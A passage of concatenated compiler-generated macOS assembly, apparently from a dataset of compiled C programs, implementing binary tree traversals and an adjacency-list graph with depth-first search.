l_.str.3: ; @.str.3 .asciz "\n" .zerofill __DATA,__bss,_main_1b2.n,4,2 ; @main_1b2.n .zerofill __DATA,__bss,_main_1b2.key,400000,2 ; @main_1b2.key .zerofill __DATA,__bss,_main_1b2.left,400000,2 ; @main_1b2.left .zerofill __DATA,__bss,_main_1b2.right,400000,2 ; @main_1b2.right .zerofill __DATA,__bss,_main_1b2.result,400000,2 ; @main_1b2.result .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _read_1b ## -- Begin function read_1b .p2align 4, 0x90 _read_1b: ## @read_1b .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq -8(%rbp), %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _scanf movl $0, -36(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -36(%rbp), %eax movq -8(%rbp), %rcx cmpl (%rcx), %eax jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rsi movslq -36(%rbp), %rax shlq $2, %rax addq %rax, %rsi movq -24(%rbp), %rdx movslq -36(%rbp), %rax shlq $2, %rax addq %rax, %rdx movq -32(%rbp), %rcx movslq -36(%rbp), %rax shlq $2, %rax addq %rax, %rcx leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB0_1 LBB0_4: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _inOrder_1b ## -- Begin function inOrder_1b .p2align 4, 0x90 _inOrder_1b: ## @inOrder_1b .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq %r8, -40(%rbp) movl $0, -44(%rbp) movl $0, -48(%rbp) movl $0, -52(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_2 Depth 2 jmp LBB1_2 LBB1_2: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $-1, -52(%rbp) jle LBB1_4 ## %bb.3: ## in Loop: Header=BB1_2 Depth=2 movl -52(%rbp), %edx movl -48(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -48(%rbp) movslq %eax, %rcx leaq _inOrder_1b.stack(%rip), %rax movl %edx, (%rax,%rcx,4) movq -24(%rbp), %rax movslq -52(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -52(%rbp) jmp LBB1_2 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 cmpl $0, -48(%rbp) je LBB1_6 ## %bb.5: ## in Loop: Header=BB1_1 Depth=1 movl -48(%rbp), %eax addl $-1, %eax movl %eax, -48(%rbp) movslq %eax, %rcx leaq _inOrder_1b.stack(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -52(%rbp) movq -16(%rbp), %rax movslq -52(%rbp), %rcx movl (%rax,%rcx,4), %edx movq -40(%rbp), %rax movl -44(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -44(%rbp) movslq %ecx, %rcx movl %edx, (%rax,%rcx,4) movq -32(%rbp), %rax movslq -52(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -52(%rbp) jmp LBB1_7 LBB1_6: popq %rbp retq LBB1_7: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_1 .cfi_endproc ## -- End function .globl _preOrder_1b ## -- Begin function preOrder_1b .p2align 4, 0x90 _preOrder_1b: ## @preOrder_1b .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq %r8, -40(%rbp) movl $0, -44(%rbp) movl $0, -48(%rbp) movl -48(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -48(%rbp) movslq %eax, %rcx leaq _preOrder_1b.stack(%rip), %rax movl $0, (%rax,%rcx,4) LBB2_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -48(%rbp) je LBB2_7 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl -48(%rbp), %eax addl $-1, %eax movl %eax, -48(%rbp) movslq %eax, %rcx leaq _preOrder_1b.stack(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -52(%rbp) movq -16(%rbp), %rax movslq -52(%rbp), %rcx movl (%rax,%rcx,4), %edx movq -40(%rbp), %rax movl -44(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -44(%rbp) movslq %ecx, %rcx movl %edx, (%rax,%rcx,4) movq -32(%rbp), %rax movslq -52(%rbp), %rcx cmpl $-1, (%rax,%rcx,4) je LBB2_4 ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 movq -32(%rbp), %rax movslq -52(%rbp), %rcx movl (%rax,%rcx,4), %edx movl -48(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -48(%rbp) movslq %eax, %rcx leaq _preOrder_1b.stack(%rip), %rax movl %edx, (%rax,%rcx,4) LBB2_4: ## in Loop: Header=BB2_1 Depth=1 movq -24(%rbp), %rax movslq -52(%rbp), %rcx cmpl $-1, (%rax,%rcx,4) je LBB2_6 ## %bb.5: ## in Loop: Header=BB2_1 Depth=1 movq -24(%rbp), %rax movslq -52(%rbp), %rcx movl (%rax,%rcx,4), %edx movl -48(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -48(%rbp) movslq %eax, %rcx leaq _preOrder_1b.stack(%rip), %rax movl %edx, (%rax,%rcx,4) LBB2_6: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_1 LBB2_7: popq %rbp retq .cfi_endproc ## -- End function .globl _postOrder_1b ## -- Begin function postOrder_1b .p2align 4, 0x90 _postOrder_1b: ## @postOrder_1b .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movq %rdx, -24(%rbp) movq %rcx, -32(%rbp) movq %r8, -40(%rbp) movl $0, -44(%rbp) movl $0, -48(%rbp) movl $0, -52(%rbp) movl $0, -60(%rbp) LBB3_1: ## =>This Inner Loop Header: Depth=1 cmpl $-1, -60(%rbp) jle LBB3_3 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movl -60(%rbp), %edx movl -48(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -48(%rbp) movslq %eax, %rcx leaq _postOrder_1b.stack(%rip), %rax movl %edx, (%rax,%rcx,4) movl -52(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -52(%rbp) movslq %eax, %rcx leaq _postOrder_1b.boolStack(%rip), %rax movb $0, (%rax,%rcx) movq -24(%rbp), %rax movslq -60(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -60(%rbp) jmp LBB3_1 LBB3_3: jmp LBB3_4 LBB3_4: ## =>This Loop Header: Depth=1 ## Child Loop BB3_8 Depth 2 cmpl $0, -48(%rbp) je LBB3_12 ## %bb.5: ## in Loop: Header=BB3_4 Depth=1 movl -48(%rbp), %eax subl $1, %eax movslq %eax, %rcx leaq _postOrder_1b.stack(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -60(%rbp) movl -52(%rbp), %eax subl $1, %eax movslq %eax, %rcx leaq _postOrder_1b.boolStack(%rip), %rax movb (%rax,%rcx), %al movb %al, -53(%rbp) cmpb $0, -53(%rbp) je LBB3_7 ## %bb.6: ## in Loop: Header=BB3_4 Depth=1 movq -16(%rbp), %rax movslq -60(%rbp), %rcx movl (%rax,%rcx,4), %edx movq -40(%rbp), %rax movl -44(%rbp), %ecx movl %ecx, %esi addl $1, %esi movl %esi, -44(%rbp) movslq %ecx, %rcx movl %edx, (%rax,%rcx,4) movl -48(%rbp), %eax addl $-1, %eax movl %eax, -48(%rbp) movl -52(%rbp), %eax addl $-1, %eax movl %eax, -52(%rbp) jmp LBB3_11 LBB3_7: ## in Loop: Header=BB3_4 Depth=1 movl -52(%rbp), %eax addl $-1, %eax movl %eax, -52(%rbp) movl -52(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -52(%rbp) movslq %eax, %rcx leaq _postOrder_1b.boolStack(%rip), %rax movb $1, (%rax,%rcx) movq -32(%rbp), %rax movslq -60(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -60(%rbp) LBB3_8: ## Parent Loop BB3_4 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $-1, -60(%rbp) jle LBB3_10 ## %bb.9: ## in Loop: Header=BB3_8 Depth=2 movl -60(%rbp), %edx movl -48(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -48(%rbp) movslq %eax, %rcx leaq _postOrder_1b.stack(%rip), %rax movl %edx, (%rax,%rcx,4) movl -52(%rbp), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, -52(%rbp) movslq %eax, %rcx leaq _postOrder_1b.boolStack(%rip), %rax movb $0, (%rax,%rcx) movq -24(%rbp), %rax movslq -60(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -60(%rbp) jmp LBB3_8 LBB3_10: ## in Loop: Header=BB3_4 Depth=1 jmp LBB3_11 LBB3_11: ## in Loop: Header=BB3_4 Depth=1 jmp LBB3_4 LBB3_12: popq %rbp retq .cfi_endproc ## -- End function .globl _print_1b ## -- Begin function print_1b .p2align 4, 0x90 _print_1b: ## @print_1b .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movq %rsi, -16(%rbp) movl $0, -20(%rbp) LBB4_1: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -4(%rbp), %eax jge LBB4_6 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 cmpl $0, -20(%rbp) jle LBB4_4 ## %bb.3: ## in Loop: Header=BB4_1 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf LBB4_4: ## in Loop: Header=BB4_1 Depth=1 movq -16(%rbp), %rax movslq -20(%rbp), %rcx movl (%rax,%rcx,4), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf ## %bb.5: ## in Loop: Header=BB4_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB4_1 LBB4_6: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main_1b2 ## -- Begin function main_1b2 .p2align 4, 0x90 _main_1b2: ## @main_1b2 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp leaq _main_1b2.n(%rip), %rdi leaq _main_1b2.key(%rip), %rsi leaq _main_1b2.left(%rip), %rdx leaq _main_1b2.right(%rip), %rcx callq _read_1b movl _main_1b2.n(%rip), %edi leaq _main_1b2.key(%rip), %rsi leaq _main_1b2.left(%rip), %rdx leaq _main_1b2.right(%rip), %rcx leaq _main_1b2.result(%rip), %r8 callq _inOrder_1b movl _main_1b2.n(%rip), %edi leaq _main_1b2.result(%rip), %rsi callq _print_1b movl _main_1b2.n(%rip), %edi leaq _main_1b2.key(%rip), %rsi leaq _main_1b2.left(%rip), %rdx leaq _main_1b2.right(%rip), %rcx leaq _main_1b2.result(%rip), %r8 callq _preOrder_1b movl _main_1b2.n(%rip), %edi leaq _main_1b2.result(%rip), %rsi callq _print_1b movl _main_1b2.n(%rip), %edi leaq _main_1b2.key(%rip), %rsi leaq _main_1b2.left(%rip), %rdx leaq _main_1b2.right(%rip), %rcx leaq _main_1b2.result(%rip), %r8 callq _postOrder_1b movl _main_1b2.n(%rip), %edi leaq _main_1b2.result(%rip), %rsi callq _print_1b leaq L_.str(%rip), %rdi leaq _main_1b2.n(%rip), %rsi movb $0, %al callq _scanf xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%d%d%d" .zerofill __DATA,__bss,_inOrder_1b.stack,400000,4 ## @inOrder_1b.stack .zerofill __DATA,__bss,_preOrder_1b.stack,400000,4 ## @preOrder_1b.stack .zerofill __DATA,__bss,_postOrder_1b.stack,400000,4 ## @postOrder_1b.stack .zerofill __DATA,__bss,_postOrder_1b.boolStack,100000,4 ## @postOrder_1b.boolStack L_.str.2: ## @.str.2 .asciz " " L_.str.3: ## @.str.3 .asciz "\n" .zerofill __DATA,__bss,_main_1b2.n,4,2 ## @main_1b2.n .zerofill __DATA,__bss,_main_1b2.key,400000,4 ## @main_1b2.key .zerofill __DATA,__bss,_main_1b2.left,400000,4 ## @main_1b2.left .zerofill __DATA,__bss,_main_1b2.right,400000,4 ## @main_1b2.right .zerofill __DATA,__bss,_main_1b2.result,400000,4 ## @main_1b2.result .subsections_via_symbols
the_stack_data/181389222.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _createNode ; -- Begin function createNode .p2align 2 _createNode: ; @createNode .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] mov x0, #16 bl _malloc str x0, [sp] ldur w8, [x29, #-4] ldr x9, [sp] str w8, [x9] ldr x8, [sp] ; kill: def $x9 killed $xzr str xzr, [x8, #8] ldr x0, [sp] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _createGraph ; -- Begin function createGraph .p2align 2 _createGraph: ; @createGraph .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] mov x0, #24 bl _malloc str x0, [sp, #16] ldur w8, [x29, #-4] ldr x9, [sp, #16] str w8, [x9] ldursw x8, [x29, #-4] lsl x0, x8, #3 bl _malloc ldr x8, [sp, #16] str x0, [x8, #16] ldursw x8, [x29, #-4] lsl x0, x8, #2 bl _malloc ldr x8, [sp, #16] str x0, [x8, #8] str wzr, [sp, #12] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #16] ldr x9, [x8, #16] ldrsw x10, [sp, #12] mov x8, #0 str x8, [x9, x10, lsl #3] ldr x8, [sp, #16] ldr x9, [x8, #8] ldrsw x10, [sp, #12] mov w8, #0 str w8, [x9, x10, lsl #2] b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB1_1 LBB1_4: ldr x0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _addEdge ; -- Begin function addEdge .p2align 2 _addEdge: ; @addEdge .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] str w2, [sp, #16] ldr w0, [sp, #16] bl _createNode str x0, [sp, #8] ldur x8, [x29, #-8] ldr x8, [x8, #16] ldursw x9, [x29, #-12] ldr x8, [x8, x9, lsl #3] ldr x9, [sp, #8] str x8, [x9, #8] ldr x8, [sp, #8] ldur x9, [x29, #-8] ldr x9, [x9, #16] ldursw x10, [x29, #-12] str x8, [x9, x10, lsl #3] ldur w0, [x29, #-12] bl _createNode str x0, [sp, #8] ldur x8, [x29, #-8] ldr x8, [x8, #16] ldrsw x9, [sp, #16] ldr x8, [x8, x9, lsl #3] ldr x9, [sp, #8] str x8, [x9, #8] ldr x8, [sp, #8] ldur x9, [x29, #-8] ldr x9, [x9, #16] ldrsw x10, [sp, #16] str x8, [x9, x10, lsl #3] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _printGraph ; -- Begin function printGraph .p2align 2 _printGraph: ; @printGraph .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur wzr, [x29, #-12] b LBB3_1 LBB3_1: ; =>This Loop Header: Depth=1 ; Child Loop BB3_3 Depth 2 ldur w8, [x29, #-12] ldur x9, [x29, #-8] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_7 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldur x8, [x29, #-8] ldr x8, [x8, #16] ldursw x9, [x29, #-12] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB3_3 LBB3_3: ; Parent Loop BB3_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB3_5 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_3 Depth=2 ldr x8, [sp, #8] ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldr x8, [sp, #8] ldr x8, [x8, #8] str x8, [sp, #8] b LBB3_3 LBB3_5: ; in Loop: Header=BB3_1 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB3_6 LBB3_6: ; in Loop: Header=BB3_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB3_1 LBB3_7: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _DFS ; -- Begin function DFS .p2align 2 _DFS: ; @DFS .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] ldur x8, [x29, #-8] ldr x8, [x8, #16] ldursw x9, [x29, #-12] ldr x8, [x8, x9, lsl #3] str x8, [sp, #24] ldr x8, [sp, #24] str x8, [sp, #16] ldur x8, [x29, #-8] ldr x9, [x8, #8] ldursw x10, [x29, #-12] mov w8, #1 str w8, [x9, x10, lsl #2] ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB4_5 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #16] ldr w8, [x8] str w8, [sp, #12] ldur x8, [x29, #-8] ldr x8, [x8, #8] ldrsw x9, [sp, #12] ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB4_4 b LBB4_3 LBB4_3: ; in Loop: Header=BB4_1 Depth=1 ldur x0, [x29, #-8] ldr w1, [sp, #12] bl _DFS b LBB4_4 LBB4_4: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #16] ldr x8, [x8, #8] str x8, [sp, #16] b LBB4_1 LBB4_5: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill stur wzr, [x29, #-4] mov w0, #4 bl _createGraph ldr w1, [sp, #12] ; 4-byte Folded Reload str x0, [sp, #16] ldr x0, [sp, #16] mov w2, #1 str w2, [sp, #4] ; 4-byte Folded Spill bl _addEdge ldr w1, [sp, #12] ; 4-byte Folded Reload ldr x0, [sp, #16] mov w2, #2 str w2, [sp, #8] ; 4-byte Folded Spill bl _addEdge ldr w1, [sp, #4] ; 4-byte Folded Reload ldr w2, [sp, #8] ; 4-byte Folded Reload ldr x0, [sp, #16] bl _addEdge ldr w1, [sp, #8] ; 4-byte Folded Reload ldr x0, [sp, #16] mov w2, #3 bl _addEdge ldr x0, [sp, #16] bl _printGraph ldr w1, [sp, #8] ; 4-byte Folded Reload ldr x0, [sp, #16] bl _DFS ldr w0, [sp, #12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\n Adjacency list of vertex %d\n " l_.str.1: ; @.str.1 .asciz "%d -> " l_.str.2: ; @.str.2 .asciz "\n" l_.str.3: ; @.str.3 .asciz "Visited %d \n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _createNode ## -- Begin function createNode .p2align 4, 0x90 _createNode: ## @createNode .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl $16, %edi callq _malloc movq %rax, -16(%rbp) movl -4(%rbp), %ecx movq -16(%rbp), %rax movl %ecx, (%rax) movq -16(%rbp), %rax movq $0, 8(%rax) movq -16(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _createGraph ## -- Begin function createGraph .p2align 4, 0x90 _createGraph: ## @createGraph .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl $24, %edi callq _malloc movq %rax, -16(%rbp) movl -4(%rbp), %ecx movq -16(%rbp), %rax movl %ecx, (%rax) movslq -4(%rbp), %rdi shlq $3, %rdi callq _malloc movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 16(%rax) movslq -4(%rbp), %rdi shlq $2, %rdi callq _malloc movq %rax, %rcx movq -16(%rbp), %rax movq %rcx, 8(%rax) movl $0, -20(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -4(%rbp), %eax jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movq -16(%rbp), %rax movq 16(%rax), %rax movslq -20(%rbp), %rcx movq $0, (%rax,%rcx,8) movq -16(%rbp), %rax movq 8(%rax), %rax movslq -20(%rbp), %rcx movl $0, (%rax,%rcx,4) ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_1 LBB1_4: movq -16(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _addEdge ## -- Begin function addEdge .p2align 4, 0x90 _addEdge: ## @addEdge .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) movl -16(%rbp), %edi callq _createNode movq %rax, -24(%rbp) movq -8(%rbp), %rax movq 16(%rax), %rax movslq -12(%rbp), %rcx movq (%rax,%rcx,8), %rcx movq -24(%rbp), %rax movq %rcx, 8(%rax) movq -24(%rbp), %rdx movq -8(%rbp), %rax movq 16(%rax), %rax movslq -12(%rbp), %rcx movq %rdx, (%rax,%rcx,8) movl -12(%rbp), %edi callq _createNode movq %rax, -24(%rbp) movq -8(%rbp), %rax movq 16(%rax), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rcx movq -24(%rbp), %rax movq %rcx, 8(%rax) movq -24(%rbp), %rdx movq -8(%rbp), %rax movq 16(%rax), %rax movslq -16(%rbp), %rcx movq %rdx, (%rax,%rcx,8) addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _printGraph ## -- Begin function printGraph .p2align 4, 0x90 _printGraph: ## @printGraph .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) movl $0, -12(%rbp) LBB3_1: ## =>This Loop Header: Depth=1 ## Child Loop BB3_3 Depth 2 movl -12(%rbp), %eax movq -8(%rbp), %rcx cmpl (%rcx), %eax jge LBB3_7 ## %bb.2: ## in Loop: Header=BB3_1 Depth=1 movq -8(%rbp), %rax movq 16(%rax), %rax movslq -12(%rbp), %rcx movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) movl -12(%rbp), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf LBB3_3: ## Parent Loop BB3_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpq $0, -24(%rbp) je LBB3_5 ## %bb.4: ## in Loop: Header=BB3_3 Depth=2 movq -24(%rbp), %rax movl (%rax), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movq -24(%rbp), %rax movq 8(%rax), %rax movq %rax, -24(%rbp) jmp LBB3_3 LBB3_5: ## in Loop: Header=BB3_1 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.6: ## in Loop: Header=BB3_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB3_1 LBB3_7: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _DFS ## -- Begin function DFS .p2align 4, 0x90 _DFS: ## @DFS .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movq -8(%rbp), %rax movq 16(%rax), %rax movslq -12(%rbp), %rcx movq (%rax,%rcx,8), %rax movq %rax, -24(%rbp) movq -24(%rbp), %rax movq %rax, -32(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movslq -12(%rbp), %rcx movl $1, (%rax,%rcx,4) movl -12(%rbp), %esi leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf LBB4_1: ## =>This Inner Loop Header: Depth=1 cmpq $0, -32(%rbp) je LBB4_5 ## %bb.2: ## in Loop: Header=BB4_1 Depth=1 movq -32(%rbp), %rax movl (%rax), %eax movl %eax, -36(%rbp) movq -8(%rbp), %rax movq 8(%rax), %rax movslq -36(%rbp), %rcx cmpl $0, (%rax,%rcx,4) jne LBB4_4 ## %bb.3: ## in Loop: Header=BB4_1 Depth=1 movq -8(%rbp), %rdi movl -36(%rbp), %esi callq _DFS LBB4_4: ## in Loop: Header=BB4_1 Depth=1 movq -32(%rbp), %rax movq 8(%rax), %rax movq %rax, -32(%rbp) jmp LBB4_1 LBB4_5: addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl $4, %edi callq _createGraph movq %rax, -16(%rbp) movq -16(%rbp), %rdi xorl %esi, %esi movl $1, %edx callq _addEdge movq -16(%rbp), %rdi xorl %esi, %esi movl $2, %edx callq _addEdge movq -16(%rbp), %rdi movl $1, %esi movl $2, %edx callq _addEdge movq -16(%rbp), %rdi movl $2, %esi movl $3, %edx callq _addEdge movq -16(%rbp), %rdi callq _printGraph movq -16(%rbp), %rdi movl $2, %esi callq _DFS xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\n Adjacency list of vertex %d\n " L_.str.1: ## @.str.1 .asciz "%d -> " L_.str.2: ## @.str.2 .asciz 